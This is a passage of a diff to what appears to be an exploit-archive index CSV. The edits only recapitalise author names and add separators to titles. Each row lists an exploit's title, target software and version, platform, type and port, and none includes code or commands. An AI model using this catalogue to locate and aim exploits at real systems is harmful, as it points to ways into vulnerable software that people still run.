Auriemma",windows,webapps,0 -19456,platforms/windows/dos/19456.txt,"PowerNet Twin Client <= 8.9 (RFSync 1.0.0.1) Crash PoC",2012-06-29,"Luigi Auriemma",windows,dos,0 +19456,platforms/windows/dos/19456.txt,"PowerNet Twin Client <= 8.9 - (RFSync 1.0.0.1) Crash PoC",2012-06-29,"Luigi Auriemma",windows,dos,0 19457,platforms/multiple/dos/19457.txt,"Microsoft Commercial Internet System 2.0/2.5_IIS 4.0_Site Server Commerce Edition 3.0 alpha/3.0 DoS",1999-08-11,"Nobuo Miwa",multiple,dos,0 19458,platforms/linux/remote/19458.c,"Linux Kernel 2.0.30/2.0.35/2.0.36/2.0.37 - Blind TCP Spoofing",1999-07-31,Nergal,linux,remote,0 19459,platforms/multiple/remote/19459.txt,"Hybrid Ircd 5.0.3 p7 - Buffer Overflow",1999-08-13,"jduck and stranjer",multiple,remote,0 @@ -16833,7 +16833,7 @@ id,file,description,date,author,platform,type,port 19464,platforms/linux/local/19464.c,"RedHat Linux <= 6.0 / Slackware Linux <= 4.0 - Termcap tgetent() Buffer Overflow (1)",1999-08-18,m0f0,linux,local,0 19465,platforms/linux/local/19465.c,"RedHat Linux <= 6.0 / Slackware Linux <= 4.0 - Termcap tgetent() Buffer Overflow (2)",1999-08-18,sk8,linux,local,0 19466,platforms/multiple/remote/19466.txt,"Hughes Technologies Mini SQL (mSQL) 2.0/2.0.10",1999-08-18,"Gregory Duchemin",multiple,remote,0 -19467,platforms/linux/local/19467.c,"GNU glibc 2.1/2.1.1 -6 pt_chown",1999-08-23,"Michal Zalewski",linux,local,0 +19467,platforms/linux/local/19467.c,"GNU glibc 2.1/2.1.1 -6 - pt_chown",1999-08-23,"Michal Zalewski",linux,local,0 19468,platforms/windows/remote/19468.txt,"Microsoft Internet Explorer 5.0 - ActiveX 'Object for constructing type libraries for scriptlets'",1999-08-21,"Georgi Guninski",windows,remote,0 19469,platforms/linux/local/19469.c,"RedHat Linux 4.2/5.2/6.0_S.u.S.E. Linux 6.0/6.1 Cron Buffer Overflow (1)",1999-08-30,Akke,linux,local,0 19470,platforms/linux/local/19470.c,"RedHat Linux 4.2/5.2/6.0_S.u.S.E. Linux 6.0/6.1 Cron Buffer Overflow (2)",1999-08-25,jbowie,linux,local,0 @@ -16850,7 +16850,7 @@ id,file,description,date,author,platform,type,port 19481,platforms/php/webapps/19481.txt,"WordPress Paid Business Listings 1.0.2 - Blind SQL Injection",2012-06-30,"Chris Kellum",php,webapps,0 19482,platforms/multiple/dos/19482.txt,"GIMP 2.8.0 FIT File Format DoS",2012-06-30,"Joseph Sheridan",multiple,dos,0 19483,platforms/windows/dos/19483.txt,"IrfanView JLS Formats PlugIn Heap Overflow",2012-06-30,"Joseph Sheridan",windows,dos,0 -19484,platforms/windows/remote/19484.rb,"HP Data Protector Create New Folder Buffer Overflow",2012-07-01,metasploit,windows,remote,3817 +19484,platforms/windows/remote/19484.rb,"HP Data Protector Create New Folder Buffer Overflow",2012-07-01,Metasploit,windows,remote,3817 19485,platforms/linux/local/19485.c,"Martin Stover Mars NWE 0.99 - Buffer Overflow Vulnerabilities",1999-08-31,"Przemyslaw Frasunek",linux,local,0 19486,platforms/windows/remote/19486.c,"Netscape Communicator 4.06/4.5/4.6/4.51/4.61 EMBED Buffer Overflow",1999-09-02,"R00t Zer0",windows,remote,0 19487,platforms/windows/remote/19487.txt,"Microsoft Internet Explorer 4.0/5.0 - ActiveX 'Eyedog'",1999-08-21,"Shane Hird's",windows,remote,0 @@ -16885,7 +16885,7 @@ id,file,description,date,author,platform,type,port 19516,platforms/windows/local/19516.txt,"Microsoft MSN Messenger Service 1.0 Setup BBS ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,local,0 19517,platforms/linux/local/19517.pl,"Emesene 2.12.5 - Password Disclosure",2012-07-01,"Daniel Godoy",linux,local,0 19793,platforms/php/webapps/19793.txt,"Magento eCommerce Local File Disclosure",2012-07-13,"SEC Consult",php,webapps,0 -19519,platforms/windows/local/19519.rb,"Irfanview JPEG2000 <= 4.3.2.0 - jp2 - Stack Buffer Overflow",2012-07-01,metasploit,windows,local,0 +19519,platforms/windows/local/19519.rb,"Irfanview JPEG2000 <= 4.3.2.0 - jp2 - Stack Buffer Overflow",2012-07-01,Metasploit,windows,local,0 19520,platforms/bsd/remote/19520.txt,"BSD telnetd Remote Root Exploit",2012-07-01,kingcope,bsd,remote,0 19521,platforms/windows/remote/19521.txt,"Microsoft Internet Explorer 5.0/4.0.1 hhopen OLE Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0 19522,platforms/linux/remote/19522.txt,"Linux Kernel 2.2 - Predictable TCP Initial Sequence Number",1999-09-27,"Stealth and S. Krahmer",linux,remote,0 @@ -16919,8 +16919,8 @@ id,file,description,date,author,platform,type,port 19551,platforms/multiple/local/19551.c,"UNICOS 9/MAX 1.3/mk 1.5_AIX <= 4.2_libc <= 5.2.18_RedHat 4_IRIX 6_Slackware 3 NLS (1)",1997-02-13,"Last Stage of Delirium",multiple,local,0 19552,platforms/multiple/local/19552.c,"UNICOS 9/MAX 1.3/mk 1.5_AIX <= 4.2_libc <= 5.2.18_RedHat 4_IRIX 6_Slackware 3 NLS (2)",1997-02-13,"Solar Designer",multiple,local,0 19553,platforms/php/remote/19553.txt,"PHP/FI 1.0/FI 2.0/FI 2.0 b10 mylog/mlog",1997-10-19,"Bryan Berg",php,remote,0 -19554,platforms/hardware/remote/19554.c,"Lucent Ascend MAX <= 5.0/Pipeline <= 6.0/TNT 1.0/2.0 Router MAX UDP Port 9 (1)",1998-03-16,Rootshell,hardware,remote,0 -19555,platforms/hardware/remote/19555.pl,"Lucent Ascend MAX <= 5.0/Pipeline <= 6.0/TNT 1.0/2.0 Router MAX UDP Port 9 (2)",1998-03-17,Rootshell,hardware,remote,0 +19554,platforms/hardware/remote/19554.c,"Lucent Ascend MAX <= 5.0/Pipeline <= 6.0/TNT 1.0/2.0 Router MAX UDP Port 9 - (1)",1998-03-16,Rootshell,hardware,remote,0 +19555,platforms/hardware/remote/19555.pl,"Lucent Ascend MAX <= 5.0/Pipeline <= 6.0/TNT 1.0/2.0 Router MAX UDP Port 9 - (2)",1998-03-17,Rootshell,hardware,remote,0 19556,platforms/multiple/local/19556.sh,"BSD 2_CND 1_Sendmail 8.x_FreeBSD 2.1.x_HP-UX 10.x_AIX 4_RedHat 4 - Sendmail Daemon",1996-11-16,"Leshka Zakharoff",multiple,local,0 19557,platforms/linux/remote/19557.txt,"John S.2 Roberts AnyForm 1.0/2.0 CGI Semicolon",1995-07-31,"Paul Phillips",linux,remote,0 19558,platforms/linux/remote/19558.c,"OpenLink Software OpenLink 3.2 - Remote Buffer Overflow",1999-10-15,"Tymm Twillman",linux,remote,0 @@ -16941,7 +16941,7 @@ id,file,description,date,author,platform,type,port 19573,platforms/php/webapps/19573.php,"Tiki Wiki CMS Groupware <= 8.3 - 'unserialize()' PHP Code Execution",2012-07-04,EgiX,php,webapps,0 19574,platforms/php/webapps/19574.txt,"Webify Link Directory SQL Injection",2012-07-04,"Daniel Godoy",php,webapps,0 19575,platforms/windows/dos/19575.txt,".NET Framework - Tilde Character DoS",2012-07-04,"Soroush Dalili",windows,dos,0 -19576,platforms/windows/remote/19576.rb,"IBM Rational ClearQuest CQOle Remote Code Execution",2012-07-05,metasploit,windows,remote,0 +19576,platforms/windows/remote/19576.rb,"IBM Rational ClearQuest CQOle Remote Code Execution",2012-07-05,Metasploit,windows,remote,0 19577,platforms/windows/dos/19577.py,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 - Services.exe Denial of Service (1)",1999-10-31,nas,windows,dos,0 19578,platforms/windows/dos/19578.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 - Services.exe Denial of Service (2)",1999-10-31,.rain.forest.puppy,windows,dos,0 19673,platforms/windows/local/19673.txt,"Microsoft Windows 95/98/NT 4.0 Help File Trojan",1999-12-10,"Pauli Ojanpera",windows,local,0 @@ -16970,7 +16970,7 @@ id,file,description,date,author,platform,type,port 19598,platforms/php/webapps/19598.txt,"Freeside SelfService CGI/API 2.3.3 - Multiple Vulnerabilities",2012-07-05,Vulnerability-Lab,php,webapps,0 19600,platforms/php/webapps/19600.txt,"CLscript CMS 3.0 - Multiple Vulnerabilities",2012-07-05,Vulnerability-Lab,php,webapps,0 19603,platforms/windows/remote/19603.txt,"Microsoft Internet Explorer 4.x/5.0_Outlook 2000 0/98 0/Express 4.x - ActiveX CAB File Execution",1999-11-08,Mukund,windows,remote,0 -20122,platforms/windows/remote/20122.rb,"Microsoft Office SharePoint Server 2007 - Remote Code Execution",2012-07-31,metasploit,windows,remote,8082 +20122,platforms/windows/remote/20122.rb,"Microsoft Office SharePoint Server 2007 - Remote Code Execution",2012-07-31,Metasploit,windows,remote,8082 30094,platforms/php/webapps/30094.txt,"DGNews 2.1 Footer.php Cross-Site Scripting",2007-05-28,"Jesper Jurcenoks",php,webapps,0 20120,platforms/windows/remote/20120.pl,"httpdx <= 1.5.4 - Remote Heap Overflow",2012-07-29,st3n,windows,remote,0 19605,platforms/linux/dos/19605.c,"Linux Kernel <= 3.2.24 - fs/eventpoll.c Local Denial of Service",2012-07-05,"Yurij M. Plotnikov",linux,dos,0 @@ -16981,7 +16981,7 @@ id,file,description,date,author,platform,type,port 19610,platforms/windows/local/19610.c,"Irfan Skiljan IrfanView32 3.0.7 Image File Buffer Overflow",1999-11-09,UNYUN,windows,local,0 19611,platforms/windows/remote/19611.txt,"TransSoft Broker FTP Server 3.0 x/4.0 User Name Buffer Overflow",1999-11-08,"Ussr Labs",windows,remote,0 19612,platforms/windows/remote/19612.pl,"Trend Micro InterScan VirusWall 3.2.3/3.3 Long HELO Buffer Overflow (1)",1999-11-07,"Alain Thivillon & Stephane Aubert",windows,remote,0 -19613,platforms/windows/remote/19613.rb,"Poison Ivy 2.3.2 C&C Server Buffer Overflow",2012-07-06,metasploit,windows,remote,3460 +19613,platforms/windows/remote/19613.rb,"Poison Ivy 2.3.2 C&C Server Buffer Overflow",2012-07-06,Metasploit,windows,remote,3460 19614,platforms/windows/remote/19614.asm,"Trend Micro InterScan VirusWall 3.2.3/3.3 Long HELO Buffer Overflow (2)",1999-11-07,"dark spyrit",windows,remote,0 19615,platforms/unix/dos/19615.c,"ISC BIND <= 8.2.2_IRIX <= 6.5.17_Solaris 7.0 - (NXT Overflow and Denial of Service) Vulnerabilities",1999-11-10,"ADM Crew",unix,dos,0 19616,platforms/windows/dos/19616.c,"Ipswitch IMail 5.0.5/5.0.6/5.0.7 - POP3 Denial of Service (Possible Buffer Overflow)",1999-11-08,Interrupt,windows,dos,0 @@ -16997,8 +16997,8 @@ id,file,description,date,author,platform,type,port 19626,platforms/php/webapps/19626.txt,"sflog! <= 1.00 - Multiple Vulnerabilities",2012-07-06,dun,php,webapps,0 19628,platforms/php/webapps/19628.txt,"Event Script PHP 1.1 CMS - Multiple Vulnerabilities",2012-07-06,Vulnerability-Lab,php,webapps,0 19629,platforms/php/webapps/19629.txt,"Webmatic 3.1.1 - Blind SQL Injection",2012-07-06,"High-Tech Bridge SA",php,webapps,0 -19630,platforms/php/webapps/19630.rb,"Tiki Wiki <= 8.3 - unserialize() PHP Code Execution",2012-07-09,metasploit,php,webapps,0 -19631,platforms/php/webapps/19631.rb,"Basilic 1.5.14 diff.php Arbitrary Command Execution",2012-07-09,metasploit,php,webapps,0 +19630,platforms/php/webapps/19630.rb,"Tiki Wiki <= 8.3 - unserialize() PHP Code Execution",2012-07-09,Metasploit,php,webapps,0 +19631,platforms/php/webapps/19631.rb,"Basilic 1.5.14 diff.php Arbitrary Command Execution",2012-07-09,Metasploit,php,webapps,0 19632,platforms/hardware/remote/19632.txt,"Tektronix Phaser Network Printer 740/750/750DP/840/930 PhaserLink Webserver",1999-11-17,"Dennis W. Mattison",hardware,remote,0 19633,platforms/windows/local/19633.txt,"Windows 95/98/Enterprise Server 4/NT Server 4/Terminal Server 4/Workstation 4 Riched Buffer Overflow",1999-11-17,"Pauli Ojanpera",windows,local,0 19634,platforms/linux/remote/19634.c,"ETL Delegate 5.9.x / 6.0.x - Buffer Overflow Vulnerabilities",1999-11-13,scut,linux,remote,0 @@ -17038,7 +17038,7 @@ id,file,description,date,author,platform,type,port 19668,platforms/solaris/remote/19668.c,"Solaris 2.5/2.5.1/2.6/7.0 sadmind Buffer Overflow (1)",1999-06-24,"Cheez Whiz",solaris,remote,0 19669,platforms/solaris/remote/19669.c,"Solaris 2.5/2.5.1/2.6/7.0 sadmind Buffer Overflow (2)",1999-06-24,"Cheez Whiz",solaris,remote,0 19670,platforms/solaris/remote/19670.c,"Solaris 2.5/2.5.1/2.6/7.0 sadmind Buffer Overflow (3)",2000-11-10,"nikolai abromov",solaris,remote,0 -19671,platforms/windows/webapps/19671.rb,"Umbraco CMS Remote Command Execution",2012-07-09,metasploit,windows,webapps,0 +19671,platforms/windows/webapps/19671.rb,"Umbraco CMS Remote Command Execution",2012-07-09,Metasploit,windows,webapps,0 19672,platforms/solaris/remote/19672.c,"Solaris 2.5/2.5.1/2.6/7.0 sadmind Buffer Overflow (4)",1999-12-10,"Cheez Whiz",solaris,remote,0 19678,platforms/windows/local/19678.c,"VDOLive Player 3.0.2 - Buffer Overflow",1999-12-13,UNYUN,windows,local,0 19679,platforms/windows/remote/19679.txt,"Infoseek Ultraseek 2.1/3.1 for NT GET Buffer Overflow",1999-12-15,"Ussr Labs",windows,remote,0 @@ -17076,11 +17076,11 @@ id,file,description,date,author,platform,type,port 19711,platforms/windows/dos/19711.txt,"Ipswitch IMail 5.0.8/6.0/6.1 IMonitor status.cgi DoS",2000-01-05,"Ussr Labs",windows,dos,0 19712,platforms/multiple/remote/19712.txt,"Allaire ColdFusion Server 4.0/4.0.1 - CFCACHE",2000-01-04,anonymous,multiple,remote,0 19713,platforms/cgi/remote/19713.pl,"Solution Scripts Home Free 1.0 - search.cgi Directory Traversal",2000-01-03,"k0ad k1d",cgi,remote,0 -40086,platforms/ruby/remote/40086.rb,"Ruby on Rails ActionPack Inline ERB Code Execution",2016-07-11,metasploit,ruby,remote,80 +40086,platforms/ruby/remote/40086.rb,"Ruby on Rails ActionPack Inline ERB Code Execution",2016-07-11,Metasploit,ruby,remote,80 19715,platforms/php/webapps/19715.txt,"WordPress WP-Predict Plugin 1.0 - Blind SQL Injection",2012-07-10,"Chris Kellum",php,webapps,0 19716,platforms/windows/dos/19716.txt,"Checkpoint Abra - Multiple Vulnerabilities",2012-07-10,"Andrey Komarov",windows,dos,0 -19717,platforms/java/remote/19717.rb,"Java Applet Field Bytecode Verifier Cache Remote Code Execution",2012-07-11,metasploit,java,remote,0 -19718,platforms/windows/remote/19718.rb,"AdminStudio - LaunchHelp.dll ActiveX Arbitrary Code Execution",2012-07-11,metasploit,windows,remote,0 +19717,platforms/java/remote/19717.rb,"Java Applet Field Bytecode Verifier Cache Remote Code Execution",2012-07-11,Metasploit,java,remote,0 +19718,platforms/windows/remote/19718.rb,"AdminStudio - LaunchHelp.dll ActiveX Arbitrary Code Execution",2012-07-11,Metasploit,windows,remote,0 19719,platforms/windows/remote/19719.txt,"Microsoft Internet Explorer 4.0/4.0.1/5.0/5.0.1/5.5 preview Security Zone Settings Lag",2000-01-07,"Georgi Guninski",windows,remote,0 19720,platforms/windows/dos/19720.c,"NullSoft Winamp 2.10 - Playlist",2000-01-10,"Steve Fewer",windows,dos,0 19721,platforms/multiple/local/19721.txt,"MySQL 3.22.27/3.22.29/3.23.8 GRANT Global Password Changing",2000-02-15,"Viktor Fougstedt",multiple,local,0 @@ -17088,7 +17088,7 @@ id,file,description,date,author,platform,type,port 19723,platforms/linux/local/19723.txt,"Corel Linux OS 1.0 get_it PATH",2000-01-12,"Cesar Tascon Alvarez",linux,local,0 19724,platforms/windows/remote/19724.txt,"Mirabilis ICQ 0.99 b 1.1.1.1/3.19 - Remote Buffer Overflow",2000-01-12,"Drew Copley",windows,remote,0 19725,platforms/windows/dos/19725.txt,"Nosque Workshop MsgCore 1.9 - Denial of Service",2000-01-13,"Ussr Labs",windows,dos,0 -19726,platforms/bsd/local/19726.c,"FreeBSD <= 3.4_NetBSD <= 1.4.1_OpenBSD <= 2.6 /proc File Sytem",2000-01-21,Nergal,bsd,local,0 +19726,platforms/bsd/local/19726.c,"FreeBSD <= 3.4_NetBSD <= 1.4.1_OpenBSD <= 2.6 - /proc File Sytem",2000-01-21,Nergal,bsd,local,0 19727,platforms/linux/local/19727.c,"Inter7 vpopmail (vchkpw) <= 3.4.11 - Buffer Overflow",2000-01-21,K2,linux,local,0 19728,platforms/windows/local/19728.txt,"Microsoft Systems Management Server 2.0 Default Permissions",1999-12-29,"Frank Monroe",windows,local,0 19729,platforms/linux/remote/19729.c,"Qualcomm qpopper 3.0 - 'LIST' Buffer Overflow",2000-01-10,Zhodiac,linux,remote,0 @@ -17120,7 +17120,7 @@ id,file,description,date,author,platform,type,port 19755,platforms/windows/dos/19755.txt,"Pragma Systems InterAccess TelnetD Server 4.0 Build 4 - Buffer Overflow",2000-02-21,"Ussr Labs",windows,dos,0 19756,platforms/freebsd/local/19756.txt,"FreeBSD 3.0/3.1/3.2/3.3/3.4 Asmon/Ascpu",2000-02-19,anonymous,freebsd,local,0 19757,platforms/solaris/local/19757.txt,"Sun Workshop 5.0 Licensing Manager Symlink",2000-02-21,sp00n,solaris,local,0 -19758,platforms/php/webapps/19758.rb,"Hastymail 2.1.1 RC1 Command Injection",2012-07-12,metasploit,php,webapps,0 +19758,platforms/php/webapps/19758.rb,"Hastymail 2.1.1 RC1 Command Injection",2012-07-12,Metasploit,php,webapps,0 19759,platforms/windows/dos/19759.c,"Microsoft Windows Media Services 4.0/4.1 Handshake Sequence DoS",2000-01-18,"Kit Knox",windows,dos,0 19760,platforms/windows/dos/19760.txt,"Pragma Systems InterAccess TelnetD Server 4.0 Terminal Configuration",2000-02-24,"Ussr Labs",windows,dos,0 19761,platforms/windows/remote/19761.txt,"Sambar Server 4.2 beta 7 Batch CGI",2000-02-24,"Georich Chorbadzhiyski",windows,remote,0 @@ -17207,8 +17207,8 @@ id,file,description,date,author,platform,type,port 19845,platforms/windows/remote/19845.pl,"Microsoft FrontPage 98 Server Extensions for IIS_Microsoft InterDev 1.0 Filename Obfuscation",2000-04-14,"rain forest puppy",windows,remote,0 19846,platforms/windows/remote/19846.pl,"Microsoft FrontPage 98 Server Extensions for IIS_Microsoft InterDev 1.0 - Buffer Overflow",2000-04-14,"Richie & Beto",windows,remote,0 19847,platforms/unix/remote/19847.c,"UoW imapd 10.234/12.264 - Buffer Overflow Vulnerabilities",2002-08-01,"Gabriel A. Maggiotti",unix,remote,0 -19848,platforms/unix/remote/19848.pm,"UoW imapd 10.234/12.264 LSUB Buffer Overflow (Metasploit)",2000-04-16,vlad902,unix,remote,0 -19849,platforms/unix/remote/19849.pm,"UoW imapd 10.234/12.264 COPY Buffer Overflow (Metasploit)",2000-04-16,vlad902,unix,remote,0 +19848,platforms/unix/remote/19848.pm,"UoW imapd 10.234/12.264 - LSUB Buffer Overflow (Metasploit)",2000-04-16,vlad902,unix,remote,0 +19849,platforms/unix/remote/19849.pm,"UoW imapd 10.234/12.264 - COPY Buffer Overflow (Metasploit)",2000-04-16,vlad902,unix,remote,0 19850,platforms/linux/dos/19850.c,"RedHat Linux 6.x - X Font Server DoS and Buffer Overflow Vulnerabilities",2000-04-16,"Michal Zalewski",linux,dos,0 19851,platforms/qnx/local/19851.c,"QSSL QNX 4.25 A crypt()",2000-04-15,Sean,qnx,local,0 19852,platforms/cgi/remote/19852.txt,"dansie shopping cart 3.0.4 - Multiple Vulnerabilities",2000-04-14,"tombow & Randy Janinda",cgi,remote,0 @@ -17216,7 +17216,7 @@ id,file,description,date,author,platform,type,port 19854,platforms/netware/dos/19854.sh,"Novell Netware 5.1 - Remote Administration Buffer Overflow",2000-04-19,"Michal Zalewski",netware,dos,0 19855,platforms/windows/local/19855.txt,"Panda Security 3.0 - Multiple Vulnerabilities",2000-04-17,Zan,windows,local,0 19856,platforms/windows/dos/19856.txt,"GameHouse dldisplay ActiveX control 0_Real Server 7.0 Port 7070 DoS",2000-04-20,"Ussr Labs",windows,dos,7070 -19857,platforms/windows/remote/19857.rb,"ALLMediaServer 0.8 - Buffer Overflow",2012-07-16,metasploit,windows,remote,888 +19857,platforms/windows/remote/19857.rb,"ALLMediaServer 0.8 - Buffer Overflow",2012-07-16,Metasploit,windows,remote,888 19905,platforms/unix/remote/19905.pl,"John Donoghue Knapster 0.9/1.3.8 File Access",2000-05-13,no_maam,unix,remote,0 19904,platforms/unix/local/19904.txt,"Intel Corporation NetStructure 7110 Undocumented Password",2000-05-08,"Stake Inc",unix,local,0 19859,platforms/hardware/webapps/19859.txt,"Vivotek Cameras Sensitive Information Disclosure",2012-07-16,GothicX,hardware,webapps,0 @@ -17267,7 +17267,7 @@ id,file,description,date,author,platform,type,port 19909,platforms/cgi/remote/19909.pl,"Mozilla Bugzilla 2.4/2.6/2.8/2.10 - Remote Arbitrary Command Execution",2000-05-11,"Frank van Vliet karin",cgi,remote,0 19910,platforms/solaris/local/19910.c,"Solaris 2.6/7.0/8 netpr Buffer Overflow (1)",1999-05-23,ADM,solaris,local,0 19911,platforms/solaris/local/19911.c,"Solaris 2.6/7.0/8 netpr Buffer Overflow (2)",1999-03-04,ADM,solaris,local,0 -19912,platforms/multiple/local/19912.txt,"Netscape Communicator 4.5/4.51/4.6/4.61/4.7/4.72/4.73 /tmp Symlink",2000-05-10,foo,multiple,local,0 +19912,platforms/multiple/local/19912.txt,"Netscape Communicator 4.5/4.51/4.6/4.61/4.7/4.72/4.73 - /tmp Symlink",2000-05-10,foo,multiple,local,0 19913,platforms/cgi/remote/19913.txt,"George Burgyan CGI Counter 4.0.2/4.0.7 Input Validation",2000-05-15,"Howard M. Kash III",cgi,remote,0 19914,platforms/windows/remote/19914.txt,"Seattle Lab Software Emurl 2.0 - Email Account Access",2000-05-15,"Pierre Benoit",windows,remote,0 19915,platforms/linux/local/19915.txt,"KDE 1.1/1.1.1/1.2/2.0 kscd SHELL Environmental Variable",2000-05-16,Sebastian,linux,local,0 @@ -17286,10 +17286,10 @@ id,file,description,date,author,platform,type,port 19928,platforms/windows/remote/19928.txt,"Microsoft Active Movie Control 1.0 Filetype",2000-05-13,http-equiv,windows,remote,0 19965,platforms/multiple/dos/19965.txt,"HP JetAdmin 6.0 - Printing DoS",2000-05-24,"Ussr Labs",multiple,dos,0 19966,platforms/linux/remote/19966.c,"Marty Bochane MDBms 0.9 xbx Buffer Overflow",2000-05-24,"HaCk-13 TeaM",linux,remote,0 -19930,platforms/windows/local/19930.rb,"Windows Escalate Task Scheduler XML Privilege Escalation",2012-07-19,metasploit,windows,local,0 -19931,platforms/windows/remote/19931.rb,"Novell ZENworks Configuration Management Preboot Service 0x06 - Buffer Overflow",2012-07-19,metasploit,windows,remote,998 -19932,platforms/windows/remote/19932.rb,"Novell ZENworks Configuration Management Preboot Service 0x21 - Buffer Overflow",2012-07-19,metasploit,windows,remote,998 -19933,platforms/linux/local/19933.rb,"Linux Kernel 2.4.4 <= 2.4.37.4 / 2.6.0 <= 2.6.30.4 - Sendpage Local Privilege Escalation (Metasploit)",2012-07-19,metasploit,linux,local,0 +19930,platforms/windows/local/19930.rb,"Windows Escalate Task Scheduler XML Privilege Escalation",2012-07-19,Metasploit,windows,local,0 +19931,platforms/windows/remote/19931.rb,"Novell ZENworks Configuration Management Preboot Service 0x06 - Buffer Overflow",2012-07-19,Metasploit,windows,remote,998 +19932,platforms/windows/remote/19932.rb,"Novell ZENworks Configuration Management Preboot Service 0x21 - Buffer Overflow",2012-07-19,Metasploit,windows,remote,998 +19933,platforms/linux/local/19933.rb,"Linux Kernel 2.4.4 <= 2.4.37.4 / 2.6.0 <= 2.6.30.4 - Sendpage Local Privilege Escalation (Metasploit)",2012-07-19,Metasploit,linux,local,0 19937,platforms/windows/remote/19937.pl,"Simple Web Server 2.2 rc2 - Remote Buffer Overflow Exploit",2012-07-19,mr.pr0n,windows,remote,0 19938,platforms/beos/dos/19938.txt,"BeOS 5.0 TCP Fragmentation Remote DoS",2000-05-18,visi0n,beos,dos,0 19939,platforms/windows/remote/19939.html,"Microsoft Internet Explorer 4.0/5.0/5.5 preview/5.0.1 - DocumentComplete() Cross Frame Access",2000-05-17,"Andrew Nosenko",windows,remote,0 @@ -17311,14 +17311,14 @@ id,file,description,date,author,platform,type,port 19955,platforms/linux/local/19955.c,"Cobalt RaQ 2.0/3.0_qpopper 2.52/2.53 - 'EUIDL' Format String Input",2000-05-24,Prizm,linux,local,0 19956,platforms/cgi/remote/19956.txt,"hp jetadmin 5.5.177/jetadmin 5.6 - Directory Traversal",2000-05-24,"Ussr Labs",cgi,remote,8000 19957,platforms/windows/remote/19957.txt,"Pacific Software Carello 1.2.1 File Duplication and Source Disclosure",2000-05-24,"Cerberus Security Team",windows,remote,0 -19958,platforms/windows/remote/19958.rb,"Novell ZENworks Configuration Management Preboot Service 0x6c Buffer Overflow",2012-07-20,metasploit,windows,remote,0 -19959,platforms/windows/remote/19959.rb,"Novell ZENworks Configuration Management Preboot Service 0x4c Buffer Overflow",2012-07-20,metasploit,windows,remote,998 +19958,platforms/windows/remote/19958.rb,"Novell ZENworks Configuration Management Preboot Service 0x6c Buffer Overflow",2012-07-20,Metasploit,windows,remote,0 +19959,platforms/windows/remote/19959.rb,"Novell ZENworks Configuration Management Preboot Service 0x4c Buffer Overflow",2012-07-20,Metasploit,windows,remote,998 19961,platforms/windows/dos/19961.txt,"Oracle Outside-In LWP File Parsing Stack Based Buffer Overflow",2012-07-20,"Francis Provencher",windows,dos,0 19962,platforms/windows/dos/19962.txt,"Oracle Outside-In JP2 File Parsing Heap Overflow",2012-07-20,"Francis Provencher",windows,dos,0 19967,platforms/multiple/local/19967.txt,"Omnis Studio 2.4 Weak Database Field Encryption",2000-05-25,Eric.Stevens,multiple,local,0 19968,platforms/windows/local/19968.c,"Windows 2000/95/98/NT 4.0 Long Filename Extension",2000-04-21,"Laurent Eschenauer",windows,local,0 19969,platforms/linux/local/19969.c,"Mandriva Linux Mandrake 7.0 - Buffer Overflow",2000-05-29,noir,linux,local,0 -19970,platforms/linux/local/19970.c,"KDE 1.1 /1.1.1/1.1.2/1.2 kdesud DISPLAY Environment Variable Overflow",2000-05-27,noir,linux,local,0 +19970,platforms/linux/local/19970.c,"KDE 1.1 - /1.1.1/1.1.2/1.2 kdesud DISPLAY Environment Variable Overflow",2000-05-27,noir,linux,local,0 19971,platforms/unix/local/19971.c,"Elm Development Group ELM 2.4/2.5.1 Mail for UNIX (ELM) Buffer Overflow (1)",2000-05-07,Scrippie,unix,local,0 19972,platforms/unix/local/19972.c,"Elm Development Group ELM 2.4/2.5.1 Mail for UNIX (ELM) Buffer Overflow (2)",2000-05-27,Buffer0verfl0w,unix,local,0 19973,platforms/windows/remote/19973.txt,"Fastraq Mailtraq 1.1.4 - Multiple Path Vulnerabilities",2000-03-22,Slash,windows,remote,0 @@ -17333,7 +17333,7 @@ id,file,description,date,author,platform,type,port 19982,platforms/bsd/dos/19982.c,"FreeBSD 3.x/4.0/5.0_NetBSD 1.4.1/1.4.2_OpenBSD 2.x - Denial of Service",2000-06-01,"Ussr Labs",bsd,dos,0 19983,platforms/linux/remote/19983.c,"NetWin DMail 2.7/2.8 ETRN Buffer Overflow",2000-06-01,noir,linux,remote,0 19984,platforms/multiple/dos/19984.c,"Eterm 0.8.10_rxvt 2.6.1_PuTTY 0.48_X11R6 3.3.3/4.0 - Denial of Service",2000-05-31,"Kit Knox",multiple,dos,0 -19985,platforms/php/webapps/19985.txt,"NetArt Media iBoutique 4.0 (index.php key parameter) SQL Injection",2012-07-20,"SecPod Research",php,webapps,0 +19985,platforms/php/webapps/19985.txt,"NetArt Media iBoutique 4.0 - (index.php key parameter) SQL Injection",2012-07-20,"SecPod Research",php,webapps,0 19986,platforms/windows/dos/19986.txt,"Oxide Webserver 2.0.4 - Denial of Service",2012-07-20,"SecPod Research",windows,dos,0 19987,platforms/linux/dos/19987.py,"ptunnel <= 0.72 - Remote Denial of Service",2012-07-20,st3n,linux,dos,0 19988,platforms/windows/dos/19988.pl,"httpdx 1.5.4 - Remote HTTP Server Denial of Service",2012-07-20,st3n,windows,dos,0 @@ -17375,8 +17375,8 @@ id,file,description,date,author,platform,type,port 20025,platforms/linux/dos/20025.txt,"Debian 2.1/2.2_Mandrake 6.0/6.1/7.0_RedHat 6.x rpc.lockd Remote Denial of Service",2000-06-08,"Mike Murray",linux,dos,0 20026,platforms/linux/dos/20026.c,"OpenLinux 2.3/2.4 / RedHat 6.0/6.1 / SCO eServer 2.3 - Denial of Service",1999-11-23,FuckGpm,linux,dos,0 20027,platforms/multiple/remote/20027.txt,"BEA Systems WebLogic Express 3.1.8/4/5 Source Code Disclosure",2000-06-21,"Foundstone Inc.",multiple,remote,0 -20028,platforms/windows/remote/20028.rb,"Simple Web Server Connection Header Buffer Overflow",2012-07-23,metasploit,windows,remote,0 -20029,platforms/php/webapps/20029.rb,"EGallery PHP File Upload",2012-07-23,metasploit,php,webapps,0 +20028,platforms/windows/remote/20028.rb,"Simple Web Server Connection Header Buffer Overflow",2012-07-23,Metasploit,windows,remote,0 +20029,platforms/php/webapps/20029.rb,"EGallery PHP File Upload",2012-07-23,Metasploit,php,webapps,0 20030,platforms/unix/remote/20030.c,"wu-ftpd 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (1)",1999-10-15,tf8,unix,remote,0 20031,platforms/linux/remote/20031.c,"wu-ftpd 2.4.2/2.5 .0/2.6.0 - Remote Format String 